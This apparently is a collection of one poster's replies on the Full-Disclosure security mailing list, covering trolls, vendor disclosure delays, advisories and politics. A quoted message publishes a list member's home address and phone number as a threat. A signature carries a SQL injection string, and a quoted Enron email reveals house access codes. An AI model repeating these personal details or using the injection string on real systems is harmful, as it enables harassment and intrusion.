On Thu, July 23, 2009 5:47 pm, Compsec Guy wrote:
>
> What's wrong with Slashdot today?

Nothing.




Re: [Full-disclosure] Black Hat USA Videos available to D/L

2009-04-02 Thread Randal T. Rioux
On Mon, March 30, 2009 8:14 pm, jmoss wrote:

> Hey Full Disclosure,
>
> I am proud to announce that the audio and video from BH USA 2008 is now
> available for free download, and is in several formats, the first of which
> is a large, hi-res format with video-sync speaker and presentation:
> https://www.blackhat.com/html/bh-usa-08/bh-usa-08-archive.html


.m4v? Really? Oh Jeff. Nobody uses Macs. We like software freedom. Come
back to the DC-stuff mailing list so we can discuss this :-)

Off to start converting videos...

Randy




Re: [Full-disclosure] Microsoft takes 7 years to 'solve' a problem?!

2008-11-25 Thread Randal T. Rioux
On Tue, November 25, 2008 1:44 am, Memisyazici, Aras wrote:

> OK... Maybe I'm going a bit extreme, but WTH?! Am I the only one who is
> interpreting this, this way? Really? When has releasing a solution to a
> problem 7 years later ever been acceptable?

May not be acceptable, but it is standard practice with some "software"
companies.

They're not closed-source because they care about security. They're
closed-source because they're lazy (and/or don't care about anything but
quick money).

Randy




Re: [Full-disclosure] n3td3v not a troll

2008-09-15 Thread Randal T. Rioux
On Mon, September 15, 2008 1:08 pm, n3td3v wrote:
> On Mon, Sep 15, 2008 at 5:49 PM,  <[EMAIL PROTECTED]> wrote:
>> On Mon, 15 Sep 2008 08:09:12 BST, n3td3v said:
>>> n3td3v is outspoken but hes not a troll. he is a serious security
>>> researcher with his own mailing list.
>>
>> ...
>>
>>> and then someone hurtfully says im a troll, what does this mean?
>>
>> It means that if you don't understand what a troll is,
>
> It means posting inflammatory comments on purpose to get a response, yet
> i've never done this ever, So I can't be a troll, because I've never
> purposely set out to post something just to get a reaction. Anything I
> say is my actual opinion, so accept it or unsubscribe.

It is "Full-Disclosure," not "Opinion-Disclosure."

Sure, you can do it. Just expect the appropriate responses.




Re: [Full-disclosure] n3td3v domain

2008-09-12 Thread Randal T. Rioux
On Fri, September 12, 2008 2:58 pm, n3td3v wrote:
> On Fri, Sep 12, 2008 at 7:48 PM, n3td3v <[EMAIL PROTECTED]> wrote:
>> On Fri, Sep 12, 2008 at 2:11 PM, root <[EMAIL PROTECTED]> wrote:
>>> All,
>>>
>>> If anyone is interested, n3td3v.com is up at auction with its first
>>> bid.
>>>
>>> Here's a direct link to the listing:
>>>
>>> https://sedo.com/auction/auction_detail.php?tracked=&partnerid=&language=us&auction_id=41146
>>>
>>
>> I'll sue you and get the 80 USD!!!
>>
>> All the best,
>>
>> n3td3v
>>
>
> I'm worried someone is going to buy this domain and put malware on it or
> use it for some other evil deed, and then I get the blame for it. :(
>
> I just hope the authorities know this domain isn't affiliated with the
> real n3td3v.
>
> These are malicious blackhats who are selling this domain, please disregard
> the 'n3td3v' reference, as it's nothing to do with n3td3v.
>
> n3td3v is a whitehat and does not endorse this sale for any purpose.

You don't get to wear a hat. We the "community" bestow on you a onesie. Pink.

FYI, these are available for normal registration fees:

n3td3v
.mobi
.org
.us
.tv
.cc
.bz
.biz
.name
.pro
.co.uk
.eu
.de

I smell a botnet cooking.

Randy




Re: [Full-disclosure] security news on cnet???

2008-09-02 Thread Randal T. Rioux
On Tue, Sep 2, 2008 at 11:07 AM, n3td3v <[EMAIL PROTECTED]> wrote:
>
> you've not post any security news all week, what's going on cnet??? is
> the journalist that does the security news off ill???
>
> :(
>
> yours,
>
> cnet fan

surely they will cave to pressure from the global powers of the netdev
group. i bet they'll be a story up for comment pretty soon now.

randy




Re: [Full-disclosure] DIE IN A FIRE post

2008-08-27 Thread Randal T. Rioux
On Wed, August 27, 2008 11:34 am, Simon Smith wrote:
> Hi Mike,
>   Next time you decide to say something stupid make sure that you do it
> anonymously.
>
> Michael C Shirk
>
> Home:
> 4205 Chapel Gate Pl
> Belcamp, MD 21017-1636
> (410) 273-1377
>
> M. Shirk wrote:
>> DIE IN A FIRE !!!1!1!
>>
>> Shirkdog
>> ' or 1=1--
>> http://www.shirkdog.us

Simon:

A: Because it messes up the order in which people normally read text.
Q: Why is top-posting such a bad thing?
A: Top-posting.
Q: What is the most annoying thing in e-mail?

Shirkdog:

Seems we share a state. Ask the evil hacker Simon for my address - come on
over. I'll back a cake.

Randy




Re: [Full-disclosure] simple phishing fix

2008-07-29 Thread Randal T. Rioux
On Tue, July 29, 2008 2:31 pm, [EMAIL PROTECTED] wrote:
> You might eliminate phishing but there are occasionally messages from
> people at these institutions also. This sort of thing is in essence
> allowing phishers a denial of service attack against anyone they choose
> to make themselves a nuisance with.
>
> I am not well pleased with any bank authentication I have seen so far
> personally; seems to me finance-related messages should be authenticated
> both ways and preferably a confirming authentication to demonstrate the
> subject agrees with the transaction should be done before such are
> accepted. That kind of thing would be hard to spoof and if done right
> pretty useless to someone who could record entire transactions.
>
> As for email, judge by its content. This posting for example will do
> nothing to your money, sells you nothing. Nor does it ask any information
> of you. If it were spoofed it would be harmless.
>
> Glenn Everhart
>

But it is from Chase and nothing good comes from Chase ;-)




Re: [Full-disclosure] Panda ActiveScan 2.0 remote code execution

2008-07-04 Thread Randal T. Rioux
On Fri, July 4, 2008 7:02 am, Panda Security Response wrote:
> Please allow at least one week for us to respond before public
> disclosure. We only received this information a few days ago.
>
> Regards,
>
> -- Pedro Bustamante Senior
> Research Advisor Panda Security

It takes a week to hit the "respond" button? At least be polite and read
your mail, perhaps with a quick "stand by, we're looking into it" response
so folks think you care.

We are an impatient lot in this community.





Re: [Full-disclosure] Out of Office AutoReply: Snort Signature to detect credit cards

2008-05-09 Thread Randal T. Rioux
On Fri, May 9, 2008 4:23 am, West, Bill (USA) wrote:
> I am no longer on-site full time and have limited access to e-mail. I will
> respond to you as soon as I can. If your issue is an emergency, please use
> the contacts below.
>
> Emergencies for MTU Users: Contact Augustin Schuster, +1-860-667-6620
> Emergencies for T-Systems & MTU Management: Contact Mike Bouranis,
> +1-248-276-3459
>
> Thanks
>

Folks, it is 2008. Like cell phones, e-mail autoresponders are no longer
cool. Use a separate address for mailing lists (like a personal or
disposable one) so we don't get bombarded with your junk.

Did I mention the social engineering treasures sent around the world with
each one? Do you really work in security?

Gah!

Randy




Re: [Full-disclosure] Snort Signature to detect credit cards

2008-05-09 Thread Randal T. Rioux
FYI - http://www.emergingthreats.net

This was discussed on the snort-sigs mailing list back in 2003. Check out
http://marc.info/?l=snort-sigs&m=106601612825950&w=2

Also, as Ray mentioned, the Emerging Threats emerging-policy.rules
contains some PCRE CC# checks. This will show you some:

$ more emerging-policy.rules | grep Number


Randy


On Thu, May 8, 2008 11:02 pm, Simon Smith wrote:
> You sure you got that URL right?
>
> Ray P wrote:
>> The free rule sets from http://www.emergingthreats.com have this
>> capability. Look in the Policy section.
>>
>> RAy
>>
>> 
>> From: [EMAIL PROTECTED]
>> To: full-disclosure@lists.grok.org.uk
>> Date: Thu, 8 May 2008 12:44:15 -0600
>> Subject: [Full-disclosure] Snort Signature to detect credit cards
>>
>>
>> Does anyone have a snort signature to detect credit cards or social
>> security numbers?
>>
>> Thank you in advance,
>>
>> Jeff
>>
>>
>
>
> --
>
> - simon
>
> --
> http://www.snosoft.com
>




[Full-disclosure] netdev threadjack and spam and al-qaeda mi5 underground contacts & secrets

2008-04-11 Thread Randal T. Rioux
On Fri, April 11, 2008 4:41 pm, n3td3v wrote:

> I'm an unemployed working class dude, i'm not part of the industry.

Can one be "unemployed" and "working class" at the same time?

If one works in security in a capacity to earn an income, would that not
automatically place them in "the industry"?





Re: [Full-disclosure] hacking a pacemaker

2008-03-14 Thread Randal T. Rioux
On Wed, March 12, 2008 4:57 am, Gadi Evron wrote:
> Almost a year ago I gave a talk at the CCC Camp in Germany I called
> "hacking the bionic man". It even made Wired, in some fashion.
> http://blog.wired.com/27bstroke6/2007/08/will-the-bionic.html
> http://events.ccc.de/camp/2007/Fahrplan/events/2049.en.html
>
> In the talk, among other things such as the DNA and scripting languages,
> medical doctors and reverse engineers...  was about cybernetic hacking.
> I gave some predictions, some for 2 years, others 40 years. Some again
> were pure science fiction. I was wrong on the 2 years, it's here.
>
> Today, this came up in the news (hat tip to Paul Ferguson on the funsec
> mailing list):
> http://www.nytimes.com/2008/03/12/business/12heart-web.html?_r=1&oref=slogin
>
> " The threat seems largely theoretical. But a team of computer security
> researchers plans to report Wednesday that it had been able to gain
> wireless access to a combination heart defibrillator and pacemaker.
>
> They were able to reprogram it to shut down and to deliver jolts of
> electricity that would potentially be fatal - if the device had been in a
> person. In this case, the researchers were hacking into a device in a
> laboratory. "
>

When I got my pacemaker I was working on some RF programming project.

My doctor told me to find another job, he could sense my curiosity.

Who could resist such fun?!

Randy




Re: [Full-disclosure] Dude VanWinkle's Death

2008-02-11 Thread Randal T. Rioux
I always think of these pics when those precious snowflakes post nonsense:

http://i118.photobucket.com/albums/o100/EMPulse_of_KC/itg_quarterly.jpg

http://www.stevelambe.com/posts/Nerd.jpg

http://www.encyclopediadramatica.com/images/8/88/Itg.jpg

Attention whores, the lot of them.

Par for the course...


On Mon, February 11, 2008 2:51 pm, Geoffrey Gowey wrote:
> I can't even believe some of the people on this list would take this
> posting as a joke.  This could have been any of us.  Disagreeing about a
> persons opinion and discussing is part of being on this list, but it's
> something else entirely when, solely based on what they voiced on a
> professional mailing list about professional topics, some of the members
> are rejoicing. Now that is just purely tasteless and cold hearted.
>
> I guess the fact that these people who are rejoicing are the same group
> that hide behind anonymous mail just goes to show that keyboard bravery
> really can separate a person from their humanity.  For those of you
> keyboard warriors who may disagree with some of the people here and voice
> your disagreement in a manner befitting a toddler I normally chalk up
> your nonsense to immaturity, but celebrating the death of someone who
> maintained his professionalism is inhuman.  It has been par for the
> course for years to have a heavy helping of nonsense come from those who
> would hide their identity not for professional reasons, but for them to
> act out what Freud defined as their Id.  This topic, however, shows these
> same bunch of people for what they truly are: self-serving immature
> cowards.
>
> I never knew really knew this person while he was alive and I am not
> trying to paint a picture of him as a saint, but for the immature lot on
> this list now would be a good time to know when to refrain from your
> impulse of banging out some immature posting.  Show some small measure of
> humanity and let those affected who knew this person grieve without your
> antics.
>
> On Feb 11, 2008 7:40 AM, Jonathan Glass <[EMAIL PROTECTED]> wrote:
>
>
>> http://www.timesreporter.com/index.php?ID=79446&r=6&Category=7
>>
>> Justin Marcus Polazzo, 31, of Atlanta, Ga., was found dead in his home
>> on Feb. 4, 2008. He was born in Alma, Mich., on Dec. 31, 1976.
>>
>> At the time of his death, Justin was employed at the Georgia Institute
>> of Technology's Office of Information Technology in the Division of
>> Architecture and Infrastructure.
>>
>> Justin is survived by his parents, mother Carol Anson Stanwyck (Doug),
>> and father Free Polazzo (Janet), brother Chad Polazzo (Lori), and
>> stepsister Liz Stanwyck. Other area surviving relatives are Betty
>> Anson, Wendy (Wagner) Muzechuk, Ashley and Maggie Haverfield and James
>> Anson (Marilyn) from Illinois.
>>
>> A memorial service will be held Sunday, Feb. 10, 2008, in Atlanta.
>>
>> It's been a sad week for the friends of Dude VanWinkle.
>>
>> --JG



Re: [Full-disclosure] [FDSA] Notepad Highly CriticalCross-SiteScripting (XSS) Vulnerability

2008-01-17 Thread Randal T. Rioux
> Fredrick Diggle Security Advisory
>
>Application: Notepad
>Versions: 5.1.2600.2180 verified to be vulnerable
>Platforms: Microsoft Windows (All Versions)
>Bugs: Cross Site Scripting (XSS)
>Severity: Critically High
>Date: 17 Jan 2008
>Credit: Estr Hinan
>
>###

>That’s a really funny “security risk”. I don’t agree with you, because
>otherwise every editor, which is able to save HTML Files, is a security
>problem. So vi, Dreamweaver, emacs… are all unsecure? It is your decision,
>to open a HTML file or not. And (if here are some MS guys) please don’t fix
>this “issue”, because sometimes, if you haven’t a professional tool at the
>moment, the Windows editor can be useful, too.  Also, if you need to edit
>some small Scripts.
>
>Yours, 
>SR
>

Speaking of professional tools...

Let's hope this was just a language translation error and not a fully 
understood response.

Lighten up, folks.


[Full-disclosure] Was secreview crap - now OpenVMS!!

2008-01-02 Thread Randal T. Rioux
>[EMAIL PROTECTED] said:

>Bonus points for knowing that VMS was mostly written in Bliss/32 or some 
>such, and VM and MVS were a mixture of assembler and (later on) PL/S. 
>No C knowledge needed for those critters...

OpenVMS is less than 40% Blissful... though I'm not familiar with the original 
source (wasn't it written on stone tablets?). About 50% is C, with a healthy 
mix of obsoletes making the difference. How something so elegant could be 
spawned from such chaos is beyond me.

Mostly, the VMS basic OS utilities are Bliss-based (think: GNU). 

I really wish HP would open OpenVMS before they kill it.

Security relevance: UNHACKABLE! 

Randy



Re: [Full-disclosure] [Professional IT Security Providers - Exposed]QuietMove ( D - )

2007-12-31 Thread Randal T. Rioux
> 
> QuiteMove
> http://www.quitemove.com
> QuietMove
> 

A tad more attention to details would be nice.

Good thing you're not graded on spelling here. C-.


Happy New Year,
Randy



full-disclosure@lists.grok.org.uk

2007-09-22 Thread Randal T. Rioux
minor float wrote:
> hi
> 
> has anybody security contact in at&t?

http://www.nsa.gov/contacts/index.cfm



Re: [Full-disclosure] Am I missing anything ?

2007-07-24 Thread Randal T. Rioux

http://uncyclopedia.org/wiki/Pot_v._Kettle



Kradorex Xeron wrote:
> Simon and Joey,
> 
> Your comments are not contributing anything of value to the list and is 
> causing SNR of the list to go down.
> 
> I strongly suggest for you to both take your personal banter off-list. I 
> suspect that the rest of the list does not want to hear your personal banter 
> toward each other.
> 
> This is a security list, not a space for your personal bickering. Grow up.
> 
> On Monday 23 July 2007 18:48, Simon Smith wrote:
>> Right kid... Can we also agree that you are immature? I mean, we can't lay
>> this to rest unless we come to a compromise. Frankly, I don't feel that it
>> would be a compromise if you didn't come half way in this relationship.
>>
>> While we're at it... Lets also agree that you're a coward, probably fat and
>> lethargic... With no real friends... Who never really gets laid?
>>
>> Yeah I think that about sums it up... ;]
>>
>> On 7/23/07 6:40 PM, "Joey Mengele" <[EMAIL PROTECTED]> wrote:
>>> No, I forgot. I now remember, thank you. As long as we agree that
>>> you were wrong, I was right, and you are an ignorant jackass who
>>> may or may not have had sexual relations with the Oreo named KF, I
>>> see no need for this thread to continue.
>>>
>>> J
>>>
>>> On Mon, 23 Jul 2007 18:38:45 -0400 Simon Smith <[EMAIL PROTECTED]>
>>>
>>> wrote:
>>>> You are right with respect to your RFI comment... But as far as me
>>>> learning
>>>> anything, don't count on it. I am after all an ignorant jackass
>>>> remember?





Re: [Full-disclosure] Macro threats

2007-06-05 Thread Randal T. Rioux
Muscarella, Sebastian (IT) wrote:

> 
> 
> NOTICE: If received in error, please destroy and notify sender. Sender
> does not intend to waive confidentiality or privilege. Use of this email
> is prohibited when received in error.
> 
> 
> 
> 

1. Shouldn't I destroy the sender *after* notifying him?

2. You may not intend to waive confidentiality or privilege, but you did.

3. You can't prohibit what I do with this email. It is mine now. Moohahaha!

Seriously. These tags piss me off. There is no legal justification. It
just makes the company's admins look like uneducated asses. I encourage
all organizations to accept the fact that your emails are community
property once you hit send. There is no e-mail Postal police nor should
there be. Encrypt everything.

Randy



Re: [Full-disclosure] The Cyber war on Iran

2007-04-04 Thread Randal T. Rioux
Paul Schmehl wrote:
SNIP
> You seem to be living under the delusion that your actions can somehow
> influence the extremists.  There's only two actions that will influence
> the extremists in any way and that is to kill or imprison them. 
> Anything else you might try, like trying to make nice with them or
> negotiate with them, is a complete waste of time and merely hastens your
> own death or imprisonment.
> 

I can't believe you made a public statement about killing or imprisoning
Mr. Bush. Of course, along with a few dozen of his hench(wo)men as well.

Be careful, they'll send you to another country to torture you. Or is
that even necessary now since he's wiped his ass with our Constitution?

Randy



Re: [Full-disclosure] Simcard 0day.

2007-01-01 Thread Randal T. Rioux
Blue Boar wrote:
> dfklsddshd wrote:
>> 1. Open attachment.
> 
> Does this actually work on people on a security mailing list?
> 
>   BB
> 
> Complete scanning result of "Simcard.com", received in VirusTotal at
> 01.02.2007, 02:38:58 (CET).
>  

you would be quite surprised, i'm sure.

randy



Re: [Full-disclosure] EEYE: Intel Network Adapter Driver Local Privilege Escalation

2006-12-12 Thread Randal T. Rioux
Josh Bressers wrote:
>> eEye Research - http://research.eeye.com
>>
>> Intel Network Adapter Driver Local Privilege Escalation
>>
>> Release Date:
>> December 7, 2006
>>
>> Date Reported:
>> July 10, 2006
>>
>> Severity:
>> Medium (Local Privilege Escalation to Kernel)
>>
>> Systems Affected:
>> Windows 2000, XP, 2003, Vista
>> Intel PRO 10/100   - 8.0.27.0 or previous
>> Intel PRO/1000 - 8.7.1.0  or previous
>> Intel PRO/1000 PCI - 9.1.30.0 or previous
>> Linux
>> Intel PRO 10/100   - 3.5.14  or previous
>> Intel PRO/1000 - 7.2.7   or previous
>> Intel PRO/10GbE- 1.0.109 or previous
>> UnixWare/SCO6
>> Intel PRO 10/100   - 4.0.3  or previous
>> Intel PRO/1000 - 9.0.15 or previous
> 
> It's worth noting that this advisory is misleading.  This flaw does not
> affect the Linux drivers.  The Linux drivers do not support the NDIS API
> and the OID concept that Windows does.
> 

Thanks for the confirmation... I thought I had gone mad for a bit there.
It just didn't sound right. The version numbers threw me off. Does
anyone know how these specific Linux driver version numbers were determined?

Randy




Re: [Full-disclosure] Enron Mail archive..... oops

2006-10-30 Thread Randal T. Rioux
Thierry Zoller wrote:
> Dear List ,
> 
> Search the Enron mail archives, for example "Password" :
> 
> http://enron.trampolinesystems.com/search/FBI#focus=/search/password
> 

I hope this code was changed:

*

Aspen Security Codes
Email details

From:
Sally Keepers
To:
[EMAIL PROTECTED] , [EMAIL PROTECTED] ,
[EMAIL PROTECTED] , [EMAIL PROTECTED] , [EMAIL PROTECTED] ,
[EMAIL PROTECTED] , Kenneth Lay (hide last 2)
Sent:
19/09/2000 at 11:26

Email metadata

Themes:

The message

Per Margie, the access code for the #2 house is 2001, for the #3 house it is
20011.

*

So many interesting emails to waste valuable time reading :-)

Randy



[Full-disclosure] [OT for crybaby list-nazis] blah blah now D.O.A.P.

2006-09-02 Thread Randal T. Rioux
William Lefkovics wrote:
> Tangential to this discussion is the no doubt (to be) controversial UK film
> D.O.A.P. soon to be screening in Toronto.
> 
> http://www.e.bell.ca/filmfest/2006/media_centre/news_releaseItem.asp?id=261
> 
> It's a docu-drama of the possible ramifications following the fictitious
> assassination of George Bush in Chicago in 2007.
> 
> Is it the London Bridge you have for sale?
>

I'm guessing it ends with the world exploding. Because the only thing
worse than the asshat we now have at the wheel here (USA) would be
Cheney steering us into an iceberg. (Trivia! Cheney and I have the same
cardiologist... WTF)

Politics aside, I like movies that stir the pot. It could be interesting.

As for the bridge... sure, L.B. works. We may have a buyer from Dallas ;-)

Randy



Re: [Full-disclosure] Re: George Bush appoints a 9 year old to... blah blah blah

2006-09-01 Thread Randal T. Rioux
Paul Schmehl wrote:
> --On Tuesday, August 29, 2006 17:34:24 -0400 [EMAIL PROTECTED] wrote:
> 
>> On Tue, 29 Aug 2006 14:55:09 CDT, Paul Schmehl said:
>>> > 1] Hezbollah has managed to become an important presence in the
>>> > Lebanese Parliament
>>>
>>> They just left out - by killing opposition leaders and threatening
>>> others.
>>
>> Like your government doesn't do that too?
>>
> Uhright.

Wow.

I have a bridge for sale... interested?

Is there a library at your school? Stop by sometime.



Re: [Full-disclosure] IBM to buy ISS

2006-08-24 Thread Randal T. Rioux
Mike Owen wrote:
> Sounds like IBM is going to buy out ISS. Having too much experience in
> dealing with IBM contractors and support, I don't think this is a good
> thing for ISS or their customers.
> 
> http://www.iss.net/about/press_center/releases/us_ibm_08233006.html

You would think IBM would try and add a security company to their ranks.
It is definitely something they should consider, rather than expanding
their waistline with bloatware.

Randy



Re: [Full-disclosure] Tempest today

2006-08-20 Thread Randal T. Rioux
[EMAIL PROTECTED] wrote:
> On Sat, 19 Aug 2006 18:49:09 -0500 Bipin Gautam
> <[EMAIL PROTECTED]> wrote:
>> Ok, here is something from the book that I was trying to
>> assemble/write.
> 
>> Some Links: http://www.eskimo.com/~joelm/tempest.html
>> http://www.erikyyy.de/tempest/
> 
>> Lets begin&
>>
>> SNIP SNIP SNIP
> 
> Please help make the list self-policing.  Follow the list charter
> and note that self-promotion is forbidden.

Please don't quote the entire message in your response if you have
nothing useful to add.



Re: [Full-disclosure] Re: Will the spammer please stop!

2006-06-22 Thread Randal T. Rioux
Dan B wrote:
> Hi,
> 
> Karol Wiesek wrote:
>> Just add rule to Your procmail or any other stuff and ignore it.
>>
>>   
> ,,,snip...snip...
> The best solution I see is sender verification, which I currently use on
> Postfix and this is the same MTA that is used for the list. It is a
> minor configuration change. Indeed it causes more traffic (verification
> of domain initially, and then a brief attempt to connect and send a mail
> to the sender), but that is nowhere near as much as this spam is generating.
> 

The words "best solution" should NEVER be used in the same sentence as
"sender verification," unless "not" separates them. It is obnoxious and
places the burden of your lack of effort or knowledge onto the sender.

Randy



Re: [Full-disclosure] ................................................Oo...............................................

2006-06-22 Thread Randal T. Rioux
nirvana wrote:
> People like
> 
> Valdis
> N3td3v
> Todd Towles
> 
> Shud fuck themselves off
> 

Did you just put Valdis in the same category as netdev?

I think my head is going to explode.



Re: [Full-disclosure] PassMark?

2006-06-12 Thread Randal T. Rioux

Gary E. Miller wrote:
> Yo All!
> 
> I thought I'd actually risk a real security question here.
> 
> Any one seen the "PassMark" (www.passmarksecurity.com) security system
> in action?
> 

Yes.

Bank of Bangalore^H^H^H^H^H^H^H^H^HAmerica uses it, as well as a recent
financial client corp. of mine.

I'm not impressed with it.

Randy



Re: [Full-disclosure] Tool Release - Tor Blocker

2006-06-04 Thread Randal T. Rioux
Jason Areff wrote:
> Those acronyms prove that I know more than you apparently. Way to
> demonstrate your l33t hax0r skills.
> 
> Jason Areff
> CISSP, A+, MCSE, Security+ == Better than Steven Rakick
> 

I haven't heard someone brag about an MCSE in almost a decade.

The + ones are just pay to have.

Even I have a CISSP. It just took people a couple years to figure out
how to hack that test (aka READ a study guide).

I'm sorry, but as someone with letters and crap as well, I must say I
like to save them for the resume and job/contract hunting. Managers
care. People that actually play in this sandbox of ours don't.

Randy



Re: [Full-disclosure] Full Disclosure "Code of conduct"

2006-05-06 Thread Randal T. Rioux

Aaron Gray wrote:
> I am suggesting that we all cooperate and produce a "Code of Conduct"
> for participating on the Full Disclosure mailing list.
>  
> Suggested start :-
>  
> 1) No Swearing
> 2) No slagging others off
> 3) No selling of exploits and vulnerabilities

4) Rename it "SecurityFocus FD"

Your number 2 is half the fun of this list. It makes people think twice
before posting something senseless. Though it isn't 100% effective, it
is better than having a paid moderator deleting messages.

Put in a swear filter. Net Nanny or something.

I do appreciate your goal, however this is a dirty and nasty arena. It
was designed to be an alternative to the cleansed and censored corporate
controlled lists.

I must say, FD is still friendlier than the underground BBSs of the 80's
& 90's. Good times.


Randal T. Rioux | Procyon Labs
IT Security R&D and Consulting
Virtual: www.procyonlabs.com
Physical: DC / Baltimore
PGP: gpg --keyserver pgp.mit.edu --recv-keys 0xD08D1941




Re: [Full-disclosure] IE7 Zero Day

2006-05-04 Thread Randal T. Rioux
[EMAIL PROTECTED] wrote:
> If you are interested in bidding.  I can provide you with an
> account to provide the funds.  Social Security numbers are for 
> American citizens only so don't assume I am such a person.
> 

I'll start the bidding at $1.25 USD. Do you take checks?

I have a slightly used half-liter bottle of Mountain Dew for trade if
you're willing to barter.

Let me know... I'm serious.

Randy

PS I found that the rotors on my Jeep wear down faster than they should.
Does anyone know a contact at Daimler/Chrysler that would be interested
in buying this vulnerability information? I don't have a fix yet though.




Re: [Full-disclosure] MSIE (mshtml.dll) OBJECT tag vulnerability

2006-04-26 Thread Randal T. Rioux

Tim Bilbro wrote:
> You do a disservice to all IT shops by announcing these vulnerabilities
> before contacting the vendor. 

I think lame inaccurate "blogging" causes more harm than research and
result dissemination.

Seriously - those who think full disclosure is bad should think a little
more. Would you be happy if all software were more like the Bush
administration? Secrets are the results of corruption. If you write
bad/insecure software and charge out the ass for it - you bet I'd want
it to work and be as secure as advertised.



Randal T. Rioux | Procyon Labs
IT Security R&D and Consulting
Virtual: www.procyonlabs.com
Physical: DC / Baltimore
PGP: gpg --keyserver pgp.mit.edu --recv-keys 0xD08D1941



Re: [Full-disclosure] security at .edus

2006-04-22 Thread Randal T. Rioux

Brian Eaton wrote:
> On 4/22/06, Sol Invictus <[EMAIL PROTECTED]> wrote:
> 
>>What you don't realize is that just by posting here that an Educational 
>>Institution
>>is vulnerable to this,  Some Readers (not me) might already be scanning for
>>web vulnerabilities at these sites across the US.
> 
> I suspect the anonymous educational institution in question is hardly
> the only vulnerable site out there.  Universities tend to be fairly
> decentralized places, where academic freedom can count for a lot more
> than a secure network.  Plus a university network has fewer secrets to
> protect than a business.
> 

Tell that to the DoD sponsored research labs within many universities.

Randy



Re: [Full-disclosure] Google Groups e-mail disclosure in plain text

2006-04-19 Thread Randal T. Rioux

Rodrigo Barbosa wrote:
> On Wed, Apr 19, 2006 at 07:09:11AM +0100, n3td3v wrote:
> 
>>>On 4/19/06, Randal T. Rioux <[EMAIL PROTECTED]> wrote:
>>>I don't think the industry needs someone to "verify" an advisory for them.
> 
> 
> Actually, you are wrong there.
> 
> More than one company pays mine to do just that. The volume of information
> contained and the huge number of advisories can cost companies some big
> bucks.
> 
> Then again, my company states pretty clear on all contracts that we
> will only filter and analyse the advisories, not produce original
> ones.
> 
> As for Secunia, I really can't comment.
> 

Fix your quoter. I didn't write that. n3td3v did.

Randy


Re: [Full-disclosure] Google Groups e-mail disclosure in plain text

2006-04-18 Thread Randal T. Rioux

n3td3v wrote:

> If they did something special with their website like Securityfocus
> does, then I might be able to bear their illegal footer message spam,
> and their scene whore republication of advisories they claim are
> Secunia exclusives.

What does SF offer? Stale news and constant subliminal ads for Symantec
products? Google ads *vomit*? An abysmal mailing list moderated by a cat
sleeping on the delete button?

I don't care what is on Secunia's site or what they do. They let
everyone bitch, fight and we're better with it than without.

You're here. You must get something out of it to stay.

I hate the Bush regime - but I'm not moving to Canada!

Randy


Re: [Full-disclosure] Noise

2006-03-29 Thread Randal T. Rioux

No. He needs to disconnect from AOL because his sister needs the phone
and his mom just yelled to him in the basement to come up for dinner.

php0t wrote:
> You need a hug.
> 
> -Original Message-
> *From:* [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] *On Behalf Of *n3td3v
> *Sent:* Thursday, March 30, 2006 12:57 AM
> *To:* full-disclosure@lists.grok.org.uk
> *Subject:* Re: [Full-disclosure] Noise
> 
> I finished school 11 years ago, in fact I left on my own accordance
> (when I was 14) because they were going to chuck me out of school
> anyway. I soon got involved in stealing cars, breaking into houses,
> and taking goods from shops. All my criminal friends went to jail, I
> was the only one left. I started using computers to pass the time
> (when I was 18) when having "no one left to hang about with", and I
> used my knowledge of criminality to work out the bad guys at Yahoo.
> I then met an employee (who will remain unnamed) to act as an
> informant for Yahoo. I then started to find my own vulnerabilities
> to Yahoo, which I reported to them. They started disrespecting me, 
> I setup my own security group to show them that I could be a match
> against them and continue to compromise their systems. I then went
> on a public crusade to tell the public all about their flaws that I
> had been keeping secret for years. Their employees who thought were
> befriending me to keep in tap with info I had were told finally to
> f*** off just last week, and now there is no connection between
> n3td3v and the yahoo security team, in fact, I mailed the official
> address and told them I wouldn't be mailing them ever again. And
> that's the current situation, up to date. Seiden at yahoo (security
> consultant/advisor/hacker) whatever you want to call him is now
> pissed off because he's getting no info feed into his corporate
> security team anymore... and the consultants and engineers who had
> opened dialog with me are now sitting in paranoia.
> 



Re: [Full-disclosure] Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)

2006-03-26 Thread Randal T. Rioux

Gadi Evron wrote:

> of security attitude I wonder why anybody believes OpenBSD is the most
> secure OS around.

No - that would be OpenVMS   :-)

At least until HP kills it.

Randy. still wondering what is 'open' about VMS



Re: [Full-disclosure] Fwd: SURROUNDED / SF & Symantec

2006-03-21 Thread Randal T. Rioux

Javor Ninov wrote:
> do you realize that your so-called popularity is based on the fact that
> FD is not moderated ? strange .. i don't see you on securityfocus.com
> 
> 
> n3td3v wrote:
> 
>>No THINK required, IS BIG, FACT.
>> 

Not to defend the mighty 'd3v, but securityfocus.com, aka Symantec, is
trash. They delete any posting to any of their owned lists that say even
the slightest bad thing about any of their weak products.

Despite the trolls, FD is the last great pasture of free security
discussion. The securityfocus lists are for clueless management types
looking to pick up buzzwords for their next big useless presentation to
the CEOs.

Randy


Re: [Full-disclosure] Re: Reported Google Vuln

2006-02-23 Thread Randal T. Rioux
Dave Korn wrote:
> nodialtone wrote:
> 
>>Google funzies.
>>
>>[Snip]
>>
>>Reference:
>>
>>http://seclists.org/lists/fulldisclosure/2006/Feb/0553.html
> 
> 
>   Ok, I give up.  Why are you posting a report to the full-disclosure list 
> to announce a post that was posted to... the full-disclosure list?  Is this 
> some kind of mail-loop joke?
> 
> 
> cheers,
>   DaveK

my head just exploded. guts hurt from laughing. thanks dave.

the dreaded fibonacci vulnerability!! it gets worse with each posting! ahh!

time for sleep...
randy